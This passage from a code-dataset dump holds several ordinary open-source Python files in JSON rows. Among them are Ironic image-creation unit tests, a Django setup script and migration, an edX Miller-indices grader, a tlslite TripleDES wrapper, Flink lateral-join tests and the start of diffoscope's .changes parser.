'sub_dir/b3'}\n\n path_exists_mock.side_effect = path_exists_mock_func\n dirname_mock.side_effect = ['root_dir', 'root_dir',\n 'root_dir/sub_dir', 'root_dir/sub_dir']\n images._create_root_fs('root_dir', files_info)\n cp_mock.assert_any_call('a1', 'root_dir/b1')\n cp_mock.assert_any_call('a2', 'root_dir/b2')\n cp_mock.assert_any_call('a3', 'root_dir/sub_dir/b3')\n\n path_exists_mock.assert_any_call('root_dir/sub_dir')\n dirname_mock.assert_any_call('root_dir/b1')\n dirname_mock.assert_any_call('root_dir/b2')\n dirname_mock.assert_any_call('root_dir/sub_dir/b3')\n mkdir_mock.assert_called_once_with('root_dir/sub_dir')\n\n @mock.patch.object(images, '_create_root_fs')\n @mock.patch.object(utils, 'tempdir')\n @mock.patch.object(utils, 'write_to_file')\n @mock.patch.object(utils, 'dd')\n @mock.patch.object(utils, 'umount')\n @mock.patch.object(utils, 'mount')\n @mock.patch.object(utils, 'mkfs')\n def test_create_vfat_image(self, mkfs_mock, mount_mock, umount_mock,\n dd_mock, write_mock, tempdir_mock, create_root_fs_mock):\n\n mock_file_handle = mock.MagicMock(spec=file)\n mock_file_handle.__enter__.return_value = 'tempdir'\n tempdir_mock.return_value = mock_file_handle\n\n parameters = {'p1': 'v1'}\n files_info = {'a': 'b'}\n images.create_vfat_image('tgt_file', parameters=parameters,\n files_info=files_info, parameters_file='qwe',\n fs_size_kib=1000)\n\n dd_mock.assert_called_once_with('/dev/zero',\n 'tgt_file',\n 'count=1',\n 'bs=1000KiB')\n\n mkfs_mock.assert_called_once_with('vfat', 'tgt_file')\n mount_mock.assert_called_once_with('tgt_file', 'tempdir',\n '-o', 'umask=0')\n\n parameters_file_path = os.path.join('tempdir', 'qwe')\n write_mock.assert_called_once_with(parameters_file_path, 'p1=v1')\n create_root_fs_mock.assert_called_once_with('tempdir', files_info)\n umount_mock.assert_called_once_with('tempdir')\n\n @mock.patch.object(images, '_create_root_fs')\n @mock.patch.object(utils, 'tempdir')\n @mock.patch.object(utils, 'dd')\n @mock.patch.object(utils, 'umount')\n @mock.patch.object(utils, 'mount')\n @mock.patch.object(utils, 'mkfs')\n def test_create_vfat_image_always_umount(self, mkfs_mock, mount_mock,\n umount_mock, dd_mock, tempdir_mock, create_root_fs_mock):\n\n mock_file_handle = mock.MagicMock(spec=file)\n mock_file_handle.__enter__.return_value = 'tempdir'\n tempdir_mock.return_value = mock_file_handle\n files_info = {'a': 'b'}\n create_root_fs_mock.side_effect = OSError()\n self.assertRaises(exception.ImageCreationFailed,\n images.create_vfat_image, 'tgt_file',\n files_info=files_info)\n\n umount_mock.assert_called_once_with('tempdir')\n\n @mock.patch.object(utils, 'dd')\n def test_create_vfat_image_dd_fails(self, dd_mock):\n\n dd_mock.side_effect = processutils.ProcessExecutionError\n self.assertRaises(exception.ImageCreationFailed,\n images.create_vfat_image, 'tgt_file')\n\n @mock.patch.object(utils, 'tempdir')\n @mock.patch.object(utils, 'dd')\n @mock.patch.object(utils, 'mkfs')\n def test_create_vfat_image_mkfs_fails(self, mkfs_mock, dd_mock,\n tempdir_mock):\n\n mock_file_handle = mock.MagicMock(spec=file)\n mock_file_handle.__enter__.return_value = 'tempdir'\n tempdir_mock.return_value = mock_file_handle\n\n mkfs_mock.side_effect = processutils.ProcessExecutionError\n self.assertRaises(exception.ImageCreationFailed,\n images.create_vfat_image, 'tgt_file')\n\n @mock.patch.object(images, '_create_root_fs')\n @mock.patch.object(utils, 'tempdir')\n @mock.patch.object(utils, 'dd')\n @mock.patch.object(utils, 'umount')\n @mock.patch.object(utils, 'mount')\n @mock.patch.object(utils, 'mkfs')\n def test_create_vfat_image_umount_fails(self, mkfs_mock, mount_mock,\n umount_mock, dd_mock, tempdir_mock, create_root_fs_mock):\n\n mock_file_handle = mock.MagicMock(spec=file)\n mock_file_handle.__enter__.return_value = 'tempdir'\n tempdir_mock.return_value = mock_file_handle\n umount_mock.side_effect = processutils.ProcessExecutionError\n\n self.assertRaises(exception.ImageCreationFailed,\n images.create_vfat_image, 'tgt_file')\n\n def test__generate_isolinux_cfg(self):\n\n kernel_params = ['key1=value1', 'key2']\n expected_cfg = (\"default boot\\n\"\n \"\\n\"\n \"label boot\\n\"\n \"kernel /vmlinuz\\n\"\n \"append initrd=/initrd text key1=value1 key2 --\")\n cfg = images._generate_isolinux_cfg(kernel_params)\n self.assertEqual(expected_cfg, cfg)\n\n @mock.patch.object(images, '_create_root_fs')\n @mock.patch.object(utils, 'write_to_file')\n @mock.patch.object(utils, 'tempdir')\n @mock.patch.object(utils, 'execute')\n @mock.patch.object(images, '_generate_isolinux_cfg')\n def test_create_isolinux_image(self, gen_cfg_mock, utils_mock,\n tempdir_mock, write_to_file_mock,\n create_root_fs_mock):\n\n mock_file_handle = mock.MagicMock(spec=file)\n mock_file_handle.__enter__.return_value = 'tmpdir'\n tempdir_mock.return_value = mock_file_handle\n\n cfg = \"cfg\"\n cfg_file = 'tmpdir/isolinux/isolinux.cfg'\n gen_cfg_mock.return_value = cfg\n\n params = ['a=b', 'c']\n\n images.create_isolinux_image('tgt_file', 'path/to/kernel',\n 'path/to/ramdisk', kernel_params=params)\n\n files_info = {\n 'path/to/kernel': 'vmlinuz',\n 'path/to/ramdisk': 'initrd',\n CONF.isolinux_bin: 'isolinux/isolinux.bin'\n }\n create_root_fs_mock.assert_called_once_with('tmpdir', files_info)\n gen_cfg_mock.assert_called_once_with(params)\n write_to_file_mock.assert_called_once_with(cfg_file, cfg)\n\n utils_mock.assert_called_once_with('mkisofs', '-r', '-V',\n \"BOOT IMAGE\", '-cache-inodes', '-J', '-l',\n '-no-emul-boot', '-boot-load-size',\n '4', '-boot-info-table', '-b', 'isolinux/isolinux.bin',\n '-o', 'tgt_file', 'tmpdir')\n\n @mock.patch.object(images, '_create_root_fs')\n @mock.patch.object(utils, 'tempdir')\n @mock.patch.object(utils, 'execute')\n def test_create_isolinux_image_rootfs_fails(self, utils_mock,\n tempdir_mock,\n create_root_fs_mock):\n create_root_fs_mock.side_effect = IOError\n\n self.assertRaises(exception.ImageCreationFailed,\n images.create_isolinux_image,\n 'tgt_file', 'path/to/kernel',\n 'path/to/ramdisk')\n\n @mock.patch.object(images, '_create_root_fs')\n @mock.patch.object(utils, 'write_to_file')\n @mock.patch.object(utils, 'tempdir')\n @mock.patch.object(utils, 'execute')\n @mock.patch.object(images, '_generate_isolinux_cfg')\n def test_create_isolinux_image_mkisofs_fails(self, gen_cfg_mock,\n utils_mock,\n tempdir_mock,\n write_to_file_mock,\n create_root_fs_mock):\n\n mock_file_handle = mock.MagicMock(spec=file)\n mock_file_handle.__enter__.return_value = 'tmpdir'\n tempdir_mock.return_value = mock_file_handle\n utils_mock.side_effect = processutils.ProcessExecutionError\n\n self.assertRaises(exception.ImageCreationFailed,\n images.create_isolinux_image,\n 'tgt_file', 'path/to/kernel',\n 'path/to/ramdisk')\n\n @mock.patch.object(images, 'create_isolinux_image')\n @mock.patch.object(images, 'fetch')\n @mock.patch.object(utils, 'tempdir')\n def test_create_boot_iso(self, tempdir_mock, fetch_images_mock,\n create_isolinux_mock):\n mock_file_handle = mock.MagicMock(spec=file)\n mock_file_handle.__enter__.return_value = 'tmpdir'\n tempdir_mock.return_value = mock_file_handle\n\n images.create_boot_iso('ctx', 'output_file', 'kernel-uuid',\n 'ramdisk-uuid', 'root-uuid', 'kernel-params')\n\n fetch_images_mock.assert_any_call('ctx', 'kernel-uuid',\n 'tmpdir/kernel-uuid', True)\n fetch_images_mock.assert_any_call('ctx', 'ramdisk-uuid',\n 'tmpdir/ramdisk-uuid', True)\n params = ['root=UUID=root-uuid', 'kernel-params']\n create_isolinux_mock.assert_called_once_with('output_file',\n 'tmpdir/kernel-uuid', 'tmpdir/ramdisk-uuid', params)\n\n @mock.patch.object(image_service, 'Service')\n def test_get_glance_image_property(self, image_service_mock):\n\n prop_dict = {'properties': {'prop1': 'val1'}}\n\n image_service_obj_mock = image_service_mock.return_value\n image_service_obj_mock.show.return_value = prop_dict\n\n ret_val = images.get_glance_image_property('con', 'uuid', 'prop1')\n image_service_mock.assert_called_once_with(version=1, context='con')\n image_service_obj_mock.show.assert_called_once_with('uuid')\n self.assertEqual('val1', ret_val)\n\n ret_val = images.get_glance_image_property('con', 'uuid', 'prop2')\n self.assertIsNone(ret_val)\n\n @mock.patch.object(image_service, 'Service')\n def test_get_temp_url_for_glance_image(self, image_service_mock):\n\n direct_url = 'swift+http://host/v1/AUTH_xx/con/obj'\n image_info = {'id': 'qwe', 'properties': {'direct_url': direct_url}}\n glance_service_mock = image_service_mock.return_value\n glance_service_mock.swift_temp_url.return_value = 'temp-url'\n glance_service_mock.show.return_value = image_info\n\n temp_url = images.get_temp_url_for_glance_image('context',\n 'glance_uuid')\n\n glance_service_mock.show.assert_called_once_with('glance_uuid')\n self.assertEqual('temp-url', temp_url)\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2435,"cells":{"repo_name":{"kind":"string","value":"mgpyh/django-fluent-comments"},"path":{"kind":"string","value":"setup.py"},"copies":{"kind":"string","value":"1"},"size":{"kind":"string","value":"2800"},"content":{"kind":"string","value":"#!/usr/bin/env python\nfrom __future__ import print_function\nfrom setuptools import setup, find_packages\nfrom os import path\nimport codecs\nimport os\nimport re\nimport sys\n\n\n# When creating the sdist, make sure the django.mo file also exists:\nif 'sdist' in sys.argv or 'develop' in sys.argv:\n try:\n os.chdir('fluent_comments')\n # from django.core.management.commands.compilemessages import Command\n # Command.compile_messages(sys.stderr)\n finally:\n os.chdir('..')\n\n\ndef read(*parts):\n file_path = path.join(path.dirname(__file__), *parts)\n return codecs.open(file_path, encoding='utf-8').read()\n\n\ndef find_version(*parts):\n version_file = read(*parts)\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\", version_file, re.M)\n if version_match:\n return str(version_match.group(1))\n raise RuntimeError(\"Unable to find version string.\")\n\n\nif sys.version_info[0] >= 3:\n # Akismet 0.2 does not support Python 3.\n install_requires=[\n 'django-crispy-forms>=1.1.1',\n ]\n if 'install' in sys.argv:\n print(\"\\nwarning: skipped Akismet as dependency because it does not have a Python 3 version.\")\nelse:\n install_requires=[\n 'django-crispy-forms>=1.1.1',\n 'akismet>=0.2',\n ]\n\nsetup(\n name='django-fluent-comments',\n version=find_version('fluent_comments', '__init__.py'),\n license='Apache License, Version 2.0',\n\n install_requires=install_requires,\n requires=[\n 'Django (>=1.3)', # Using staticfiles\n ],\n extras_require = {\n 'threadedcomments': ['django-threadedcomments>=0.9'],\n },\n description='A modern, ajax-based appearance for django_comments',\n long_description=read('README.rst'),\n\n author='Diederik van der Boor',\n author_email='opensource@edoburu.nl',\n\n url='https://github.com/edoburu/django-fluent-comments',\n download_url='https://github.com/edoburu/django-fluent-comments/zipball/master',\n\n packages=find_packages(exclude=('example*',)),\n include_package_data=True,\n\n zip_safe=False,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.3',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Application Frameworks',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ]\n)\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2436,"cells":{"repo_name":{"kind":"string","value":"andyzsf/edx"},"path":{"kind":"string","value":"common/lib/chem/chem/miller.py"},"copies":{"kind":"string","value":"182"},"size":{"kind":"string","value":"9162"},"content":{"kind":"string","value":"\"\"\" Calculation of Miller indices \"\"\"\n\nimport numpy as np\nimport math\nimport fractions as fr\nimport decimal\nimport json\n\n\ndef lcm(a, b):\n \"\"\"\n Returns least common multiple of a, b\n\n Args:\n a, b: floats\n\n Returns:\n float\n \"\"\"\n return a * b / fr.gcd(a, b)\n\n\ndef segment_to_fraction(distance):\n \"\"\"\n Converts lengths of which the plane cuts the axes to fraction.\n\n Tries convert distance to closest nicest fraction with denominator less or\n equal than 10. It is\n purely for simplicity and clearance of learning purposes. Jenny: 'In typical\n courses students usually do not encounter indices any higher than 6'.\n\n If distance is not a number (numpy nan), it means that plane is parallel to\n axis or contains it. Inverted fraction to nan (nan is 1/0) = 0 / 1 is\n returned\n\n Generally (special cases):\n\n a) if distance is smaller than some constant, i.g. 0.01011,\n than fraction's denominator usually much greater than 10.\n\n b) Also, if student will set point on 0.66 -> 1/3, so it is 333 plane,\n But if he will slightly move the mouse and click on 0.65 -> it will be\n (16,15,16) plane. That's why we are doing adjustments for points coordinates,\n to the closest tick, tick + tick / 2 value. And now UI sends to server only\n values multiple to 0.05 (half of tick). Same rounding is implemented for\n unittests.\n\n But if one will want to calculate miller indices with exact coordinates and\n with nice fractions (which produce small Miller indices), he may want shift\n to new origin if segments are like S = (0.015, > 0.05, >0.05) - close to zero\n in one coordinate. He may update S to (0, >0.05, >0.05) and shift origin.\n In this way he can receive nice small fractions. Also there is can be\n degenerated case when S = (0.015, 0.012, >0.05) - if update S to (0, 0, >0.05) -\n it is a line. This case should be considered separately. Small nice Miller\n numbers and possibility to create very small segments can not be implemented\n at same time).\n\n\n Args:\n distance: float distance that plane cuts on axis, it must not be 0.\n Distance is multiple of 0.05.\n\n Returns:\n Inverted fraction.\n 0 / 1 if distance is nan\n\n \"\"\"\n if np.isnan(distance):\n return fr.Fraction(0, 1)\n else:\n fract = fr.Fraction(distance).limit_denominator(10)\n return fr.Fraction(fract.denominator, fract.numerator)\n\n\ndef sub_miller(segments):\n '''\n Calculates Miller indices from segments.\n\n Algorithm:\n\n 1. Obtain inverted fraction from segments\n\n 2. Find common denominator of inverted fractions\n\n 3. Lead fractions to common denominator and throws denominator away.\n\n 4. Return obtained values.\n\n Args:\n List of 3 floats, meaning distances that plane cuts on x, y, z axes.\n Any float not equals zero, it means that plane does not intersect origin,\n i. e. shift of origin has already been done.\n\n Returns:\n String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2)\n '''\n fracts = [segment_to_fraction(segment) for segment in segments]\n common_denominator = reduce(lcm, [fract.denominator for fract in fracts])\n miller_indices = ([\n fract.numerator * math.fabs(common_denominator) / fract.denominator\n for fract in fracts\n ])\n return'(' + ','.join(map(str, map(decimal.Decimal, miller_indices))) + ')'\n\n\ndef miller(points):\n \"\"\"\n Calculates Miller indices from points.\n\n Algorithm:\n\n 1. Calculate normal vector to a plane that goes trough all points.\n\n 2. Set origin.\n\n 3. Create Cartesian coordinate system (Ccs).\n\n 4. Find the lengths of segments of which the plane cuts the axes. Equation\n of a line for axes: Origin + (Coordinate_vector - Origin) * parameter.\n\n 5. If plane goes trough Origin:\n\n a) Find new random origin: find unit cube vertex, not crossed by a plane.\n\n b) Repeat 2-4.\n\n c) Fix signs of segments after Origin shift. This means to consider\n original directions of axes. I.g.: Origin was 0,0,0 and became\n new_origin. If new_origin has same Y coordinate as Origin, then segment\n does not change its sign. But if new_origin has another Y coordinate than\n origin (was 0, became 1), than segment has to change its sign (it now\n lies on negative side of Y axis). New Origin 0 value of X or Y or Z\n coordinate means that segment does not change sign, 1 value -> does\n change. So new sign is (1 - 2 * new_origin): 0 -> 1, 1 -> -1\n\n 6. Run function that calculates miller indices from segments.\n\n Args:\n List of points. Each point is list of float coordinates. Order of\n coordinates in point's list: x, y, z. Points are different!\n\n Returns:\n String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2)\n \"\"\"\n\n N = np.cross(points[1] - points[0], points[2] - points[0])\n O = np.array([0, 0, 0])\n P = points[0] # point of plane\n Ccs = map(np.array, [[1.0, 0, 0], [0, 1.0, 0], [0, 0, 1.0]])\n segments = ([\n np.dot(P - O, N) / np.dot(ort, N) if np.dot(ort, N) != 0\n else np.nan for ort in Ccs\n ])\n if any(x == 0 for x in segments): # Plane goes through origin.\n vertices = [\n # top:\n np.array([1.0, 1.0, 1.0]),\n np.array([0.0, 0.0, 1.0]),\n np.array([1.0, 0.0, 1.0]),\n np.array([0.0, 1.0, 1.0]),\n # bottom, except 0,0,0:\n np.array([1.0, 0.0, 0.0]),\n np.array([0.0, 1.0, 0.0]),\n np.array([1.0, 1.0, 1.0]),\n ]\n for vertex in vertices:\n if np.dot(vertex - O, N) != 0: # vertex not in plane\n new_origin = vertex\n break\n # obtain new axes with center in new origin\n X = np.array([1 - new_origin[0], new_origin[1], new_origin[2]])\n Y = np.array([new_origin[0], 1 - new_origin[1], new_origin[2]])\n Z = np.array([new_origin[0], new_origin[1], 1 - new_origin[2]])\n new_Ccs = [X - new_origin, Y - new_origin, Z - new_origin]\n segments = ([np.dot(P - new_origin, N) / np.dot(ort, N) if\n np.dot(ort, N) != 0 else np.nan for ort in new_Ccs])\n # fix signs of indices: 0 -> 1, 1 -> -1 (\n segments = (1 - 2 * new_origin) * segments\n\n return sub_miller(segments)\n\n\ndef grade(user_input, correct_answer):\n '''\n Grade crystallography problem.\n\n Returns true if lattices are the same and Miller indices are same or minus\n same. E.g. (2,2,2) = (2, 2, 2) or (-2, -2, -2). Because sign depends only\n on student's selection of origin.\n\n Args:\n user_input, correct_answer: json. Format:\n\n user_input: {\"lattice\":\"sc\",\"points\":[[\"0.77\",\"0.00\",\"1.00\"],\n [\"0.78\",\"1.00\",\"0.00\"],[\"0.00\",\"1.00\",\"0.72\"]]}\n\n correct_answer: {'miller': '(00-1)', 'lattice': 'bcc'}\n\n \"lattice\" is one of: \"\", \"sc\", \"bcc\", \"fcc\"\n\n Returns:\n True or false.\n '''\n def negative(m):\n \"\"\"\n Change sign of Miller indices.\n\n Args:\n m: string with meaning of Miller indices. E.g.:\n (-6,3,-6) -> (6, -3, 6)\n\n Returns:\n String with changed signs.\n \"\"\"\n output = ''\n i = 1\n while i in range(1, len(m) - 1):\n if m[i] in (',', ' '):\n output += m[i]\n elif m[i] not in ('-', '0'):\n output += '-' + m[i]\n elif m[i] == '0':\n output += m[i]\n else:\n i += 1\n output += m[i]\n i += 1\n return '(' + output + ')'\n\n def round0_25(point):\n \"\"\"\n Rounds point coordinates to closest 0.5 value.\n\n Args:\n point: list of float coordinates. Order of coordinates: x, y, z.\n\n Returns:\n list of coordinates rounded to closes 0.5 value\n \"\"\"\n rounded_points = []\n for coord in point:\n base = math.floor(coord * 10)\n fractional_part = (coord * 10 - base)\n aliquot0_25 = math.floor(fractional_part / 0.25)\n if aliquot0_25 == 0.0:\n rounded_points.append(base / 10)\n if aliquot0_25 in (1.0, 2.0):\n rounded_points.append(base / 10 + 0.05)\n if aliquot0_25 == 3.0:\n rounded_points.append(base / 10 + 0.1)\n return rounded_points\n\n user_answer = json.loads(user_input)\n\n if user_answer['lattice'] != correct_answer['lattice']:\n return False\n\n points = [map(float, p) for p in user_answer['points']]\n\n if len(points) < 3:\n return False\n\n # round point to closes 0.05 value\n points = [round0_25(point) for point in points]\n\n points = [np.array(point) for point in points]\n # print miller(points), (correct_answer['miller'].replace(' ', ''),\n # negative(correct_answer['miller']).replace(' ', ''))\n if miller(points) in (correct_answer['miller'].replace(' ', ''), negative(correct_answer['miller']).replace(' ', '')):\n return True\n\n return False\n"},"license":{"kind":"string","value":"agpl-3.0"}}},{"rowIdx":2437,"cells":{"repo_name":{"kind":"string","value":"RockySteveJobs/python-for-android"},"path":{"kind":"string","value":"python-build/python-libs/gdata/build/lib/gdata/tlslite/utils/OpenSSL_TripleDES.py"},"copies":{"kind":"string","value":"359"},"size":{"kind":"string","value":"1666"},"content":{"kind":"string","value":"\"\"\"OpenSSL/M2Crypto 3DES implementation.\"\"\"\n\nfrom cryptomath import *\nfrom TripleDES import *\n\nif m2cryptoLoaded:\n\n def new(key, mode, IV):\n return OpenSSL_TripleDES(key, mode, IV)\n\n class OpenSSL_TripleDES(TripleDES):\n\n def __init__(self, key, mode, IV):\n TripleDES.__init__(self, key, mode, IV, \"openssl\")\n self.key = key\n self.IV = IV\n\n def _createContext(self, encrypt):\n context = m2.cipher_ctx_new()\n cipherType = m2.des_ede3_cbc()\n m2.cipher_init(context, cipherType, self.key, self.IV, encrypt)\n return context\n\n def encrypt(self, plaintext):\n TripleDES.encrypt(self, plaintext)\n context = self._createContext(1)\n ciphertext = m2.cipher_update(context, plaintext)\n m2.cipher_ctx_free(context)\n self.IV = ciphertext[-self.block_size:]\n return ciphertext\n\n def decrypt(self, ciphertext):\n TripleDES.decrypt(self, ciphertext)\n context = self._createContext(0)\n #I think M2Crypto has a bug - it fails to decrypt and return the last block passed in.\n #To work around this, we append sixteen zeros to the string, below:\n plaintext = m2.cipher_update(context, ciphertext+('\\0'*16))\n\n #If this bug is ever fixed, then plaintext will end up having a garbage\n #plaintext block on the end. That's okay - the below code will ignore it.\n plaintext = plaintext[:len(ciphertext)]\n m2.cipher_ctx_free(context)\n self.IV = ciphertext[-self.block_size:]\n return plaintext"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2438,"cells":{"repo_name":{"kind":"string","value":"apache/flink"},"path":{"kind":"string","value":"flink-python/pyflink/table/tests/test_correlate.py"},"copies":{"kind":"string","value":"5"},"size":{"kind":"string","value":"4123"},"content":{"kind":"string","value":"################################################################################\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\nfrom pyflink.table import expressions as expr\nfrom pyflink.testing.test_case_utils import PyFlinkStreamTableTestCase\n\n\nclass CorrelateTests(PyFlinkStreamTableTestCase):\n\n def test_join_lateral(self):\n t_env = self.t_env\n t_env.create_java_temporary_system_function(\"split\",\n \"org.apache.flink.table.legacyutils.TableFunc1\")\n source = t_env.from_elements([(\"1\", \"1#3#5#7\"), (\"2\", \"2#4#6#8\")], [\"id\", \"words\"])\n\n result = source.join_lateral(\"split(words) as (word)\")\n\n query_operation = result._j_table.getQueryOperation()\n self.assertEqual('INNER', query_operation.getJoinType().toString())\n self.assertTrue(query_operation.isCorrelated())\n self.assertEqual('true', query_operation.getCondition().toString())\n\n def test_join_lateral_with_join_predicate(self):\n t_env = self.t_env\n t_env.create_java_temporary_system_function(\"split\",\n \"org.apache.flink.table.legacyutils.TableFunc1\")\n source = t_env.from_elements([(\"1\", \"1#3#5#7\"), (\"2\", \"2#4#6#8\")], [\"id\", \"words\"])\n\n result = source.join_lateral(expr.call('split', source.words).alias('word'),\n expr.col('id') == expr.col('word'))\n\n query_operation = result._j_table.getQueryOperation()\n self.assertEqual('INNER', query_operation.getJoinType().toString())\n self.assertTrue(query_operation.isCorrelated())\n self.assertEqual('equals(id, word)',\n query_operation.getCondition().toString())\n\n def test_left_outer_join_lateral(self):\n t_env = self.t_env\n t_env.create_java_temporary_system_function(\"split\",\n \"org.apache.flink.table.legacyutils.TableFunc1\")\n source = t_env.from_elements([(\"1\", \"1#3#5#7\"), (\"2\", \"2#4#6#8\")], [\"id\", \"words\"])\n\n result = source.left_outer_join_lateral(expr.call('split', source.words).alias('word'))\n\n query_operation = result._j_table.getQueryOperation()\n self.assertEqual('LEFT_OUTER', query_operation.getJoinType().toString())\n self.assertTrue(query_operation.isCorrelated())\n self.assertEqual('true', query_operation.getCondition().toString())\n\n def test_left_outer_join_lateral_with_join_predicate(self):\n t_env = self.t_env\n t_env.create_java_temporary_system_function(\"split\",\n \"org.apache.flink.table.legacyutils.TableFunc1\")\n source = t_env.from_elements([(\"1\", \"1#3#5#7\"), (\"2\", \"2#4#6#8\")], [\"id\", \"words\"])\n\n # only support \"true\" as the join predicate currently\n result = source.left_outer_join_lateral(expr.call('split', source.words).alias('word'),\n expr.lit(True))\n\n query_operation = result._j_table.getQueryOperation()\n self.assertEqual('LEFT_OUTER', query_operation.getJoinType().toString())\n self.assertTrue(query_operation.isCorrelated())\n self.assertEqual('true', query_operation.getCondition().toString())\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2439,"cells":{"repo_name":{"kind":"string","value":"peterbarkley/SurfGeckos"},"path":{"kind":"string","value":"djangosite/snippets/migrations/0012_auto_20170917_2131.py"},"copies":{"kind":"string","value":"1"},"size":{"kind":"string","value":"2390"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# Generated by Django 1.11.5 on 2017-09-18 07:31\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('snippets', '0011_auto_20170917_2103'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='actionlevel',\n name='aquatic_ecotoxicity',\n field=models.FloatField(blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='actionlevel',\n name='direct_exposure',\n field=models.FloatField(blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='actionlevel',\n name='dw_toxicity',\n field=models.FloatField(blank=True, null=True, verbose_name='Drinking Water Toxicity'),\n ),\n migrations.AlterField(\n model_name='actionlevel',\n name='gw_gross_contamination',\n field=models.FloatField(blank=True, null=True, verbose_name='Groundwater Gross Contamination'),\n ),\n migrations.AlterField(\n model_name='actionlevel',\n name='gw_vapor_emissions',\n field=models.FloatField(blank=True, null=True, verbose_name='Groundwater Vapor Emissions'),\n ),\n migrations.AlterField(\n model_name='actionlevel',\n name='indoor_air',\n field=models.FloatField(blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='actionlevel',\n name='leaching',\n field=models.FloatField(blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='actionlevel',\n name='shallow_soil_vapor',\n field=models.FloatField(blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='actionlevel',\n name='soil_gross_contamination',\n field=models.FloatField(blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='actionlevel',\n name='soil_vapor_emissions',\n field=models.FloatField(blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='actionlevel',\n name='terrestrial_ecotoxicity',\n field=models.FloatField(blank=True, null=True),\n ),\n ]\n"},"license":{"kind":"string","value":"mit"}}},{"rowIdx":2440,"cells":{"repo_name":{"kind":"string","value":"anthraxx/diffoscope"},"path":{"kind":"string","value":"diffoscope/changes.py"},"copies":{"kind":"string","value":"2"},"size":{"kind":"string","value":"11351"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n#\n# changes.py — .changes file handling class\n#\n# This file was originally part of debexpo\n# https://alioth.debian.org/projects/debexpo/\n#\n# Copyright © 2008 Jonny Lamb \n# Copyright © 2010 Jan Dittberner \n# Copyright © 2012 Arno Töll \n# Copyright © 2012 Paul Tagliamonte \n# Copyright © 2014 Jérémy Bobbio \n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the \"Software\"), to deal in the Software without\n# restriction, including without limitation the rights to use,\n# copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following\n# conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\nThis code deals with the reading and processing of Debian .changes files. This\ncode is copyright (c) Jonny Lamb, and is used by dput, rather then created as\na result of it. Thank you Jonny.\n\"\"\"\n\n__author__ = 'Jonny Lamb'\n__copyright__ = 'Copyright © 2008 Jonny Lamb, Copyright © 2010 Jan Dittberner'\n__license__ = 'MIT'\n\nimport os.path\nimport hashlib\nimport logging\nimport subprocess\n\nfrom debian import deb822\n\nfrom .tools import tool_required\n\nlogger = logging.getLogger(__name__)\n\n\nclass ChangesFileException(Exception):\n pass\n\n\nclass Changes(object):\n \"\"\"\n Changes object to help process and store information regarding Debian\n .changes files, used in the upload process.\n \"\"\"\n\n def __init__(self, filename=None, string=None):\n \"\"\"\n Object constructor. The object allows the user to specify **either**:\n\n #. a path to a *changes* file to parse\n #. a string with the *changes* file contents.\n\n ::\n\n a = Changes(filename='/tmp/packagename_version.changes')\n b = Changes(string='Source: packagename\\\\nMaintainer: ...')\n\n ``filename``\n Path to *changes* file to parse.\n\n ``string``\n *changes* file in a string to parse.\n \"\"\"\n if (filename and string) or (not filename and not string):\n raise TypeError\n\n if filename:\n self._absfile = os.path.abspath(filename)\n self._directory = os.path.dirname(self._absfile)\n self._data = deb822.Changes(open(filename, encoding='utf-8'))\n self.basename = os.path.basename(filename)\n else:\n self._data = deb822.Changes(string)\n\n if len(self._data) == 0:\n raise ChangesFileException('Changes file could not be parsed.')\n\n def get_filename(self):\n \"\"\"\n Returns the filename from which the changes file was generated from.\n Please do note this is just the basename, not the entire full path, or\n even a relative path. For the absolute path to 